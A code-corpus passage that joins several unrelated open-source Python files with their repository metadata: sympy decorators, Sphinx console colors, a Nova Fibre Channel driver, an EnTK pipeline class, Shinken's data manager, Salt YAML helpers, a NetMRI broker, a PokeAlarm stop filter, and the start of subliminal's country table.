on the pointer to object's global namespace. If you apply other decorators
first, ``@public`` may end up modifying the wrong namespace.
Examples
========
>>> from sympy.utilities.decorator import public
>>> __all__
Traceback (most recent call last):
...
NameError: name '__all__' is not defined
>>> @public
... def some_function():
... pass
>>> __all__
['some_function']
"""
if isinstance(obj, types.FunctionType):
ns = get_function_globals(obj)
name = get_function_name(obj)
elif isinstance(obj, (type(type), class_types)):
ns = sys.modules[obj.__module__].__dict__
name = obj.__name__
else:
raise TypeError("expected a function or a class, got %s" % obj)
if "__all__" not in ns:
ns["__all__"] = [name]
else:
ns["__all__"].append(name)
return obj
def memoize_property(storage):
"""Create a property, where the lookup is stored in ``storage``"""
def decorator(method):
name = method.__name__
def wrapper(self):
if name not in storage:
storage[name] = method(self)
return storage[name]
return property(update_wrapper(wrapper, method))
return decorator
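# Illustrative sketch (editor's addition, not part of the original module): the cached
# value is keyed by the method name inside the caller-supplied ``storage`` dict, so it
# is shared by all instances. ``_demo_storage`` and ``_DemoCached`` are hypothetical.
_demo_storage = {}
class _DemoCached(object):
    @memoize_property(_demo_storage)
    def answer(self):
        return 41 + 1   # computed once, then served from _demo_storage['answer']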
| bsd-3-clause | -3,076,124,693,571,021,300 | 29.690821 | 99 | 0.614513 | false |
SnappleCap/oh-mainline | vendor/packages/sphinx/sphinx/util/console.py | 16 | 2430 | # -*- coding: utf-8 -*-
"""
sphinx.util.console
~~~~~~~~~~~~~~~~~~~
Format colored console output.
:copyright: Copyright 2007-2013 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import os
import sys
import re
_ansi_re = re.compile('\x1b\\[(\\d\\d;){0,2}\\d\\dm')
codes = {}
def get_terminal_width():
"""Borrowed from the py lib."""
try:
import termios, fcntl, struct
call = fcntl.ioctl(0, termios.TIOCGWINSZ,
struct.pack('hhhh', 0, 0, 0, 0))
height, width = struct.unpack('hhhh', call)[:2]
terminal_width = width
except (SystemExit, KeyboardInterrupt):
raise
except:
# FALLBACK
terminal_width = int(os.environ.get('COLUMNS', 80)) - 1
return terminal_width
_tw = get_terminal_width()
def term_width_line(text):
if not codes:
# if no coloring, don't output fancy backspaces
return text + '\n'
else:
# codes are not displayed, this must be taken into account
return text.ljust(_tw + len(text) - len(_ansi_re.sub('', text))) + '\r'
def color_terminal():
if not hasattr(sys.stdout, 'isatty'):
return False
if not sys.stdout.isatty():
return False
if 'COLORTERM' in os.environ:
return True
term = os.environ.get('TERM', 'dumb').lower()
if term in ('xterm', 'linux') or 'color' in term:
return True
return False
def nocolor():
codes.clear()
def coloron():
codes.update(_orig_codes)
def colorize(name, text):
return codes.get(name, '') + text + codes.get('reset', '')
def create_color_func(name):
def inner(text):
return colorize(name, text)
globals()[name] = inner
_attrs = {
'reset': '39;49;00m',
'bold': '01m',
'faint': '02m',
'standout': '03m',
'underline': '04m',
'blink': '05m',
}
for _name, _value in _attrs.items():
codes[_name] = '\x1b[' + _value
_colors = [
('black', 'darkgray'),
('darkred', 'red'),
('darkgreen', 'green'),
('brown', 'yellow'),
('darkblue', 'blue'),
('purple', 'fuchsia'),
('turquoise', 'teal'),
('lightgray', 'white'),
]
for i, (dark, light) in enumerate(_colors):
codes[dark] = '\x1b[%im' % (i+30)
codes[light] = '\x1b[%i;01m' % (i+30)
_orig_codes = codes.copy()
for _name in codes:
create_color_func(_name)
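# Illustrative sketch (editor's addition, not part of the original module): the loop
# above injects one helper per code name into this module's globals (e.g. ``red``,
# ``bold``). ``_demo_error_line`` is a hypothetical helper showing typical usage.
def _demo_error_line(message):
    if not color_terminal():
        nocolor()   # drop all ANSI codes on terminals without color support
    return term_width_line(bold(red('error: ')) + message)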
| agpl-3.0 | -2,138,386,143,499,903,700 | 23.059406 | 79 | 0.55679 | false |
JioCloud/nova_test_latest | nova/virt/libvirt/volume/fibrechannel.py | 5 | 3175 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from os_brick.initiator import connector
from oslo_config import cfg
from oslo_log import log as logging
from nova import utils
from nova.virt.libvirt.volume import volume as libvirt_volume
CONF = cfg.CONF
CONF.import_opt('num_iscsi_scan_tries', 'nova.virt.libvirt.volume.volume',
group='libvirt')
LOG = logging.getLogger(__name__)
class LibvirtFibreChannelVolumeDriver(libvirt_volume.LibvirtBaseVolumeDriver):
"""Driver to attach Fibre Channel Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtFibreChannelVolumeDriver,
self).__init__(connection, is_block_dev=False)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'FIBRE_CHANNEL', utils._get_root_helper(),
use_multipath=CONF.libvirt.iscsi_use_multipath,
device_scan_attempts=CONF.libvirt.num_iscsi_scan_tries)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtFibreChannelVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
def connect_volume(self, connection_info, disk_info):
"""Attach the volume to instance_name."""
LOG.debug("Calling os-brick to attach FC Volume")
device_info = self.connector.connect_volume(connection_info['data'])
LOG.debug("Attached FC volume %s", device_info)
connection_info['data']['device_path'] = device_info['path']
if 'multipath_id' in device_info:
connection_info['data']['multipath_id'] = \
device_info['multipath_id']
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
LOG.debug("calling os-brick to detach FC Volume")
# TODO(walter-boring) eliminated the need for preserving
# multipath_id. Use scsi_id instead of multipath -ll
# This will then eliminate the need to pass anything in
# the 2nd param of disconnect_volume and be consistent
# with the rest of the connectors.
self.connector.disconnect_volume(connection_info['data'],
connection_info['data'])
LOG.debug("Disconnected FC Volume %s", disk_dev)
super(LibvirtFibreChannelVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
| apache-2.0 | -911,435,707,571,293,300 | 40.776316 | 78 | 0.666772 | false |
vivek-bala/radical.entk-0.6 | src/radical/entk/pipeline/pipeline.py | 2 | 5917 | import radical.utils as ru
from radical.entk.exceptions import *
from radical.entk.stage.stage import Stage
import threading
from radical.entk import states
class Pipeline(object):
"""
A pipeline represents a collection of objects that have a linear temporal execution order.
In this case, a pipeline consists of multiple 'Stage' objects. Each ```Stage_i``` can execute only
after all stages up to ```Stage_(i-1)``` have completed execution.
"""
def __init__(self):
self._uid = ru.generate_id('radical.entk.pipeline')
self._stages = list()
self._name = str()
self._state = states.NEW
# To keep track of current state
self._stage_count = len(self._stages)
self._cur_stage = 0
# Lock around current stage
self._lock = threading.Lock()
# To keep track of termination of pipeline
self._completed_flag = threading.Event()
def _validate_stages(self, stages):
if not isinstance(stages, list):
stages = [stages]
for val in stages:
if not isinstance(val, Stage):
raise TypeError(expected_type=Stage, actual_type=type(val))
return stages
# -----------------------------------------------
# Getter functions
# -----------------------------------------------
@property
def name(self):
"""
Name of the pipeline
:getter: Returns the name of the pipeline
:setter: Assigns the name of the pipeline
:type: String
"""
return self._name
@property
def stages(self):
"""
Stages of the list
:getter: Returns the stages in the current Pipeline
:setter: Assigns the stages to the current Pipeline
:type: List
"""
return self._stages
@property
def state(self):
"""
Current state of the pipeline
:getter: Returns the state of the current pipeline
:type: String
"""
return self._state
@property
def _stage_lock(self):
"""
Returns the lock over the current Pipeline
:return: Lock object
"""
return self._lock
@property
def _completed(self):
"""
Returns whether the Pipeline has completed
:return: Boolean
"""
return self._completed_flag.is_set()
@property
def _current_stage(self):
"""
Returns the current stage being executed
:return: Integer
"""
return self._cur_stage
@property
def uid(self):
"""
Unique ID of the current pipeline
:getter: Returns the unique id of the current pipeline
:type: String
"""
return self._uid
# -----------------------------------------------
# -----------------------------------------------
# Setter functions
# -----------------------------------------------
@name.setter
def name(self, value):
if isinstance(value,str):
self._name = value
else:
raise TypeError(expected_type=str, actual_type=type(value))
@stages.setter
def stages(self, stages):
self._stages = self._validate_stages(stages)
self._pass_uid()
self._stage_count = len(self._stages)
@state.setter
def state(self, value):
if isinstance(value,str):
self._state = value
else:
raise TypeError(expected_type=str, actual_type=type(value))
# -----------------------------------------------
def add_stages(self, stages):
"""
Appends stages to the current Pipeline
:argument: List of Stage objects
"""
stages = self._validate_stages(stages)
stages = self._pass_uid(stages)
self._stages.extend(stages)
self._stage_count = len(self._stages)
def remove_stages(self, stage_names):
"""
Remove stages from the current Pipeline
:argument: List of stage names as strings
"""
if not isinstance(stage_names, list):
stage_names = [stage_names]
for val in stage_names:
if not isinstance(val, str):
raise TypeError(expected_type=str, actual_type=type(val))
copy_of_existing_stages = self._stages
copy_stage_names = stage_names
for stage in self._stages:
for stage_name in stage_names:
if stage.name == stage_name:
copy_of_existing_stages.remove(stage)
                    copy_stage_names.remove(stage_name)
stage_names = copy_stage_names
self._stages = copy_of_existing_stages
self._stage_count = len(self._stages)
def _pass_uid(self, stages=None):
"""
Pass current Pipeline's uid to all stages
:argument: List of Stage objects (optional)
:return: List of updated Stage objects
"""
if stages is None:
for stage in self._stages:
stage._parent_pipeline = self._uid
stage._pass_uid()
else:
for stage in stages:
stage._parent_pipeline = self._uid
stage._pass_uid()
return stages
def _increment_stage(self):
"""
Increment pointer to current stage, also check if Pipeline has completed
"""
if self._cur_stage < self._stage_count-1:
self._cur_stage+=1
else:
self._completed_flag.set()
def _decrement_stage(self):
"""
Decrement pointer to current stage
"""
if self._cur_stage > 1:
self._cur_stage -= 1
self._completed_flag = threading.Event() # reset
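# Illustrative sketch (editor's addition, not part of the original module): stages are
# appended in the order they should execute. ``_demo_pipeline`` is a hypothetical
# helper; it assumes Stage objects can be created with no arguments.
def _demo_pipeline():
    p = Pipeline()
    p.name = 'demo-pipeline'
    # add_stages() accepts a single Stage or a list of Stage objects and preserves
    # the linear execution order described in the class docstring
    p.add_stages([Stage(), Stage()])
    return p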
| mit | -7,714,318,281,532,125,000 | 22.577689 | 102 | 0.524759 | false |
KerkhoffTechnologies/shinken | shinken/misc/datamanager.py | 17 | 12704 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
from shinken.util import safe_print
from shinken.misc.sorter import hst_srv_sort, last_state_change_earlier
from shinken.misc.filter import only_related_to
class DataManager(object):
def __init__(self):
self.rg = None
def load(self, rg):
self.rg = rg
    # The UI will send us names as str, but we store unicode in our rg,
    # so we must handle the conversion here
def get_host(self, hname):
hname = hname.decode('utf8', 'ignore')
return self.rg.hosts.find_by_name(hname)
def get_service(self, hname, sdesc):
hname = hname.decode('utf8', 'ignore')
sdesc = sdesc.decode('utf8', 'ignore')
return self.rg.services.find_srv_by_name_and_hostname(hname, sdesc)
def get_all_hosts_and_services(self):
all = []
all.extend(self.rg.hosts)
all.extend(self.rg.services)
return all
def get_contact(self, name):
name = name.decode('utf8', 'ignore')
return self.rg.contacts.find_by_name(name)
def get_contactgroup(self, name):
name = name.decode('utf8', 'ignore')
return self.rg.contactgroups.find_by_name(name)
def get_contacts(self):
return self.rg.contacts
def get_hostgroups(self):
return self.rg.hostgroups
def get_hostgroup(self, name):
return self.rg.hostgroups.find_by_name(name)
def get_servicegroups(self):
return self.rg.servicegroups
def get_servicegroup(self, name):
return self.rg.servicegroups.find_by_name(name)
# Get the hostgroups sorted by names, and zero size in the end
# if selected one, put it in the first place
def get_hostgroups_sorted(self, selected=''):
r = []
selected = selected.strip()
hg_names = [hg.get_name() for hg in self.rg.hostgroups
if len(hg.members) > 0 and hg.get_name() != selected]
hg_names.sort()
hgs = [self.rg.hostgroups.find_by_name(n) for n in hg_names]
hgvoid_names = [hg.get_name() for hg in self.rg.hostgroups
if len(hg.members) == 0 and hg.get_name() != selected]
hgvoid_names.sort()
hgvoids = [self.rg.hostgroups.find_by_name(n) for n in hgvoid_names]
if selected:
hg = self.rg.hostgroups.find_by_name(selected)
if hg:
r.append(hg)
r.extend(hgs)
r.extend(hgvoids)
return r
def get_hosts(self):
return self.rg.hosts
def get_services(self):
return self.rg.services
def get_schedulers(self):
return self.rg.schedulers
def get_pollers(self):
return self.rg.pollers
def get_brokers(self):
return self.rg.brokers
def get_receivers(self):
return self.rg.receivers
def get_reactionners(self):
return self.rg.reactionners
def get_program_start(self):
for c in self.rg.configs.values():
return c.program_start
return None
def get_realms(self):
return self.rg.realms
def get_realm(self, r):
if r in self.rg.realms:
return r
return None
# Get the hosts tags sorted by names, and zero size in the end
def get_host_tags_sorted(self):
r = []
names = self.rg.tags.keys()
names.sort()
for n in names:
r.append((n, self.rg.tags[n]))
return r
# Get the hosts tagged with a specific tag
def get_hosts_tagged_with(self, tag):
r = []
for h in self.get_hosts():
if tag in h.get_host_tags():
r.append(h)
return r
# Get the services tags sorted by names, and zero size in the end
def get_service_tags_sorted(self):
r = []
names = self.rg.services_tags.keys()
names.sort()
for n in names:
r.append((n, self.rg.services_tags[n]))
return r
def get_important_impacts(self):
res = []
for s in self.rg.services:
if s.is_impact and s.state not in ['OK', 'PENDING']:
if s.business_impact > 2:
res.append(s)
for h in self.rg.hosts:
if h.is_impact and h.state not in ['UP', 'PENDING']:
if h.business_impact > 2:
res.append(h)
return res
# Returns all problems
def get_all_problems(self, to_sort=True, get_acknowledged=False):
res = []
if not get_acknowledged:
res.extend([s for s in self.rg.services
if s.state not in ['OK', 'PENDING'] and
not s.is_impact and not s.problem_has_been_acknowledged and
not s.host.problem_has_been_acknowledged])
res.extend([h for h in self.rg.hosts
if h.state not in ['UP', 'PENDING'] and
not h.is_impact and not h.problem_has_been_acknowledged])
else:
res.extend([s for s in self.rg.services
if s.state not in ['OK', 'PENDING'] and not s.is_impact])
res.extend([h for h in self.rg.hosts
if h.state not in ['UP', 'PENDING'] and not h.is_impact])
if to_sort:
res.sort(hst_srv_sort)
return res
# returns problems, but the most recent before
def get_problems_time_sorted(self):
pbs = self.get_all_problems(to_sort=False)
pbs.sort(last_state_change_earlier)
return pbs
# Return all non managed impacts
def get_all_impacts(self):
res = []
for s in self.rg.services:
if s.is_impact and s.state not in ['OK', 'PENDING']:
# If s is acked, pass
if s.problem_has_been_acknowledged:
continue
# We search for impacts that were NOT currently managed
if len([p for p in s.source_problems if not p.problem_has_been_acknowledged]) > 0:
res.append(s)
for h in self.rg.hosts:
if h.is_impact and h.state not in ['UP', 'PENDING']:
# If h is acked, pass
if h.problem_has_been_acknowledged:
continue
# We search for impacts that were NOT currently managed
if len([p for p in h.source_problems if not p.problem_has_been_acknowledged]) > 0:
res.append(h)
return res
# Return the number of problems
def get_nb_problems(self):
return len(self.get_all_problems(to_sort=False))
# Get the number of all problems, even the ack ones
def get_nb_all_problems(self, user):
res = []
res.extend([s for s in self.rg.services
if s.state not in ['OK', 'PENDING'] and not s.is_impact])
res.extend([h for h in self.rg.hosts
if h.state not in ['UP', 'PENDING'] and not h.is_impact])
return len(only_related_to(res, user))
# Return the number of impacts
def get_nb_impacts(self):
return len(self.get_all_impacts())
def get_nb_elements(self):
return len(self.rg.services) + len(self.rg.hosts)
def get_important_elements(self):
res = []
# We want REALLY important things, so business_impact > 2, but not just IT elements that are
# root problems, so we look only for config defined my_own_business_impact value too
res.extend([s for s in self.rg.services
if (s.business_impact > 2 and not 0 <= s.my_own_business_impact <= 2)])
res.extend([h for h in self.rg.hosts
if (h.business_impact > 2 and not 0 <= h.my_own_business_impact <= 2)])
print "DUMP IMPORTANT"
for i in res:
safe_print(i.get_full_name(), i.business_impact, i.my_own_business_impact)
return res
# For all business impacting elements, and give the worse state
# if warning or critical
def get_overall_state(self):
h_states = [h.state_id for h in self.rg.hosts
if h.business_impact > 2 and h.is_impact and h.state_id in [1, 2]]
s_states = [s.state_id for s in self.rg.services
if s.business_impact > 2 and s.is_impact and s.state_id in [1, 2]]
print "get_overall_state:: hosts and services business problems", h_states, s_states
if len(h_states) == 0:
h_state = 0
else:
h_state = max(h_states)
if len(s_states) == 0:
s_state = 0
else:
s_state = max(s_states)
# Ok, now return the max of hosts and services states
return max(h_state, s_state)
# Same but for pure IT problems
def get_overall_it_state(self):
h_states = [h.state_id for h in self.rg.hosts if h.is_problem and h.state_id in [1, 2]]
s_states = [s.state_id for s in self.rg.services if s.is_problem and s.state_id in [1, 2]]
if len(h_states) == 0:
h_state = 0
else:
h_state = max(h_states)
if len(s_states) == 0:
s_state = 0
else:
s_state = max(s_states)
# Ok, now return the max of hosts and services states
return max(h_state, s_state)
# Get percent of all Services
def get_per_service_state(self):
all_services = self.rg.services
problem_services = []
problem_services.extend([s for s in self.rg.services
if s.state not in ['OK', 'PENDING'] and not s.is_impact])
if len(all_services) == 0:
res = 0
else:
res = int(100 - (len(problem_services) * 100) / float(len(all_services)))
return res
# Get percent of all Hosts
def get_per_hosts_state(self):
all_hosts = self.rg.hosts
problem_hosts = []
problem_hosts.extend([s for s in self.rg.hosts
if s.state not in ['UP', 'PENDING'] and not s.is_impact])
if len(all_hosts) == 0:
res = 0
else:
res = int(100 - (len(problem_hosts) * 100) / float(len(all_hosts)))
return res
# For all business impacting elements, and give the worse state
# if warning or critical
def get_len_overall_state(self):
h_states = [h.state_id for h in self.rg.hosts
if h.business_impact > 2 and h.is_impact and h.state_id in [1, 2]]
s_states = [s.state_id for s in self.rg.services
if s.business_impact > 2 and s.is_impact and s.state_id in [1, 2]]
print "get_len_overall_state:: hosts and services business problems", h_states, s_states
# Just return the number of impacting elements
return len(h_states) + len(s_states)
# Return a tree of {'elt': Host, 'fathers': [{}, {}]}
def get_business_parents(self, obj, levels=3):
res = {'node': obj, 'fathers': []}
# if levels == 0:
# return res
for i in obj.parent_dependencies:
# We want to get the levels deep for all elements, but
# go as far as we should for bad elements
if levels != 0 or i.state_id != 0:
par_elts = self.get_business_parents(i, levels=levels - 1)
res['fathers'].append(par_elts)
print "get_business_parents::Give elements", res
return res
    # Ok, we do not have true root problems, but we can try to guess, can't we?
    # We can just guess from the other services of this host, in fact
def guess_root_problems(self, obj):
if obj.__class__.my_type != 'service':
return []
r = [s for s in obj.host.services if s.state_id != 0 and s != obj]
return r
datamgr = DataManager()
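# Illustrative sketch (editor's addition, not part of the original module):
# get_business_parents() returns a nested dict of the form
# {'node': host_or_service, 'fathers': [subtrees of the same shape]}; this
# hypothetical helper flattens such a tree into a plain list of nodes.
def _walk_business_parents(tree):
    nodes = [tree['node']]
    for father in tree['fathers']:
        nodes.extend(_walk_business_parents(father))
    return nodes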
| agpl-3.0 | -1,641,608,022,287,670,500 | 35.505747 | 100 | 0.578322 | false |
stephane-martin/salt-debian-packaging | salt-2016.3.3/salt/utils/yamlencoding.py | 3 | 1477 | # -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import
import io
# Import 3rd-party libs
import yaml
import salt.ext.six as six
def yaml_dquote(text):
'''
Make text into a double-quoted YAML string with correct escaping
for special characters. Includes the opening and closing double
quote characters.
'''
with io.StringIO() as ostream:
yemitter = yaml.emitter.Emitter(ostream)
yemitter.write_double_quoted(six.text_type(text))
return ostream.getvalue()
def yaml_squote(text):
'''
Make text into a single-quoted YAML string with correct escaping
for special characters. Includes the opening and closing single
quote characters.
'''
with io.StringIO() as ostream:
yemitter = yaml.emitter.Emitter(ostream)
yemitter.write_single_quoted(six.text_type(text))
return ostream.getvalue()
def yaml_encode(data):
'''
A simple YAML encode that can take a single-element datatype and return
a string representation.
'''
yrepr = yaml.representer.SafeRepresenter()
ynode = yrepr.represent_data(data)
if not isinstance(ynode, yaml.ScalarNode):
raise TypeError(
"yaml_encode() only works with YAML scalar data;"
" failed for {0}".format(type(data))
)
tag = ynode.tag.rsplit(':', 1)[-1]
ret = ynode.value
if tag == "str":
ret = yaml_dquote(ynode.value)
return ret
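# Illustrative sketch (editor's addition, not part of the original module): rough idea
# of what the helpers above return; the exact escaping is delegated to the PyYAML
# emitter. ``_demo_yaml_encoding`` is a hypothetical example name.
def _demo_yaml_encoding():
    quoted = yaml_dquote('say "hi"')     # double-quoted scalar, inner quotes escaped
    squoted = yaml_squote("it's here")   # single-quoted scalar, quotes doubled
    encoded = yaml_encode(42)            # non-string scalar, returned unquoted
    return quoted, squoted, encoded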
| apache-2.0 | -1,531,240,202,982,533,600 | 25.854545 | 75 | 0.654705 | false |
infobloxopen/infoblox-netmri | infoblox_netmri/api/broker/v3_6_0/apic_setting_broker.py | 5 | 2774 | from ..broker import Broker
class ApicSettingBroker(Broker):
controller = "apic_settings"
def index(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("find"), kwargs)
def show(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def create(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("create"), kwargs)
def update(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
def destroy(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("destroy"), kwargs)
def destroy_many(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("destroy_many"), kwargs)
def dump_apic_controllers(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("dump_apic_controllers"), kwargs)
def import_controllers(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("import_controllers"), kwargs)
| apache-2.0 | -4,035,939,897,109,853,700 | 23.121739 | 91 | 0.566691 | false |
fosJoddie/PokeAlarm | PokeAlarm/Filters/StopFilter.py | 1 | 2372 | # Standard Library Imports
import operator
# 3rd Party Imports
# Local Imports
from . import BaseFilter
class StopFilter(BaseFilter):
""" Filter class for limiting which stops trigger a notification. """
def __init__(self, name, data):
""" Initializes base parameters for a filter. """
super(StopFilter, self).__init__(name)
# Distance
self.min_dist = self.evaluate_attribute( # f.min_dist <= m.distance
event_attribute='distance', eval_func=operator.le,
limit=BaseFilter.parse_as_type(float, 'min_dist', data))
        self.max_dist = self.evaluate_attribute(  # f.max_dist >= m.distance
event_attribute='distance', eval_func=operator.ge,
limit=BaseFilter.parse_as_type(float, 'max_dist', data))
# Time Left
self.min_time_left = self.evaluate_attribute(
# f.min_time_left <= r.time_left
event_attribute='time_left', eval_func=operator.le,
limit=BaseFilter.parse_as_type(int, 'min_time_left', data))
self.max_time_left = self.evaluate_attribute(
# f.max_time_left >= r.time_left
event_attribute='time_left', eval_func=operator.ge,
limit=BaseFilter.parse_as_type(int, 'max_time_left', data))
# Geofences
self.geofences = BaseFilter.parse_as_set(str, 'geofences', data)
# Custom DTS
self.custom_dts = BaseFilter.parse_as_dict(
str, str, 'custom_dts', data)
# Missing Info
self.is_missing_info = BaseFilter.parse_as_type(
bool, 'is_missing_info', data)
# Reject leftover parameters
for key in data:
raise ValueError("'{}' is not a recognized parameter for"
" Stop filters".format(key))
def to_dict(self):
""" Create a dict representation of this Filter. """
settings = {}
# Distance
if self.min_dist is not None:
settings['min_dist'] = self.min_dist
if self.max_dist is not None:
settings['max_dist'] = self.max_dist
# Geofences
if self.geofences is not None:
settings['geofences'] = self.geofences
# Missing Info
if self.is_missing_info is not None:
settings['missing_info'] = self.is_missing_info
return settings
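# Illustrative sketch (editor's addition, not part of the original module): shape of
# the ``data`` dict consumed by __init__ above; the values are arbitrary examples and
# the key names are exactly the ones parsed by the filter.
_EXAMPLE_STOP_FILTER_DATA = {
    'min_dist': 0, 'max_dist': 1000,              # distance window for the event
    'min_time_left': 300, 'max_time_left': 1800,  # time-left window for the event
    'geofences': ['downtown'],
    'is_missing_info': False
}
# StopFilter('example', _EXAMPLE_STOP_FILTER_DATA) would build a filter from this dict;
# the leftover-parameter check in __init__ rejects any unrecognized key.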
| agpl-3.0 | 302,555,712,462,100,700 | 34.402985 | 76 | 0.591906 | false |
isnnn/Sick-Beard-TPB | lib/subliminal/language.py | 23 | 54744 | # -*- coding: utf-8 -*-
# Copyright 2011-2012 Antoine Bertin <[email protected]>
#
# This file is part of subliminal.
#
# subliminal is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# subliminal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with subliminal. If not, see <http://www.gnu.org/licenses/>.
from .utils import to_unicode
import re
import logging
logger = logging.getLogger("subliminal")
COUNTRIES = [('AF', 'AFG', '004', u'Afghanistan'),
('AX', 'ALA', '248', u'Åland Islands'),
('AL', 'ALB', '008', u'Albania'),
('DZ', 'DZA', '012', u'Algeria'),
('AS', 'ASM', '016', u'American Samoa'),
('AD', 'AND', '020', u'Andorra'),
('AO', 'AGO', '024', u'Angola'),
('AI', 'AIA', '660', u'Anguilla'),
('AQ', 'ATA', '010', u'Antarctica'),
('AG', 'ATG', '028', u'Antigua and Barbuda'),
('AR', 'ARG', '032', u'Argentina'),
('AM', 'ARM', '051', u'Armenia'),
('AW', 'ABW', '533', u'Aruba'),
('AU', 'AUS', '036', u'Australia'),
('AT', 'AUT', '040', u'Austria'),
('AZ', 'AZE', '031', u'Azerbaijan'),
('BS', 'BHS', '044', u'Bahamas'),
('BH', 'BHR', '048', u'Bahrain'),
('BD', 'BGD', '050', u'Bangladesh'),
('BB', 'BRB', '052', u'Barbados'),
('BY', 'BLR', '112', u'Belarus'),
('BE', 'BEL', '056', u'Belgium'),
('BZ', 'BLZ', '084', u'Belize'),
('BJ', 'BEN', '204', u'Benin'),
('BM', 'BMU', '060', u'Bermuda'),
('BT', 'BTN', '064', u'Bhutan'),
('BO', 'BOL', '068', u'Bolivia, Plurinational State of'),
('BQ', 'BES', '535', u'Bonaire, Sint Eustatius and Saba'),
('BA', 'BIH', '070', u'Bosnia and Herzegovina'),
('BW', 'BWA', '072', u'Botswana'),
('BV', 'BVT', '074', u'Bouvet Island'),
('BR', 'BRA', '076', u'Brazil'),
('IO', 'IOT', '086', u'British Indian Ocean Territory'),
('BN', 'BRN', '096', u'Brunei Darussalam'),
('BG', 'BGR', '100', u'Bulgaria'),
('BF', 'BFA', '854', u'Burkina Faso'),
('BI', 'BDI', '108', u'Burundi'),
('KH', 'KHM', '116', u'Cambodia'),
('CM', 'CMR', '120', u'Cameroon'),
('CA', 'CAN', '124', u'Canada'),
('CV', 'CPV', '132', u'Cape Verde'),
('KY', 'CYM', '136', u'Cayman Islands'),
('CF', 'CAF', '140', u'Central African Republic'),
('TD', 'TCD', '148', u'Chad'),
('CL', 'CHL', '152', u'Chile'),
('CN', 'CHN', '156', u'China'),
('CX', 'CXR', '162', u'Christmas Island'),
('CC', 'CCK', '166', u'Cocos (Keeling) Islands'),
('CO', 'COL', '170', u'Colombia'),
('KM', 'COM', '174', u'Comoros'),
('CG', 'COG', '178', u'Congo'),
('CD', 'COD', '180', u'Congo, The Democratic Republic of the'),
('CK', 'COK', '184', u'Cook Islands'),
('CR', 'CRI', '188', u'Costa Rica'),
('CI', 'CIV', '384', u'Côte d\'Ivoire'),
('HR', 'HRV', '191', u'Croatia'),
('CU', 'CUB', '192', u'Cuba'),
('CW', 'CUW', '531', u'Curaçao'),
('CY', 'CYP', '196', u'Cyprus'),
('CZ', 'CZE', '203', u'Czech Republic'),
('DK', 'DNK', '208', u'Denmark'),
('DJ', 'DJI', '262', u'Djibouti'),
('DM', 'DMA', '212', u'Dominica'),
('DO', 'DOM', '214', u'Dominican Republic'),
('EC', 'ECU', '218', u'Ecuador'),
('EG', 'EGY', '818', u'Egypt'),
('SV', 'SLV', '222', u'El Salvador'),
('GQ', 'GNQ', '226', u'Equatorial Guinea'),
('ER', 'ERI', '232', u'Eritrea'),
('EE', 'EST', '233', u'Estonia'),
('ET', 'ETH', '231', u'Ethiopia'),
('FK', 'FLK', '238', u'Falkland Islands (Malvinas)'),
('FO', 'FRO', '234', u'Faroe Islands'),
('FJ', 'FJI', '242', u'Fiji'),
('FI', 'FIN', '246', u'Finland'),
('FR', 'FRA', '250', u'France'),
('GF', 'GUF', '254', u'French Guiana'),
('PF', 'PYF', '258', u'French Polynesia'),
('TF', 'ATF', '260', u'French Southern Territories'),
('GA', 'GAB', '266', u'Gabon'),
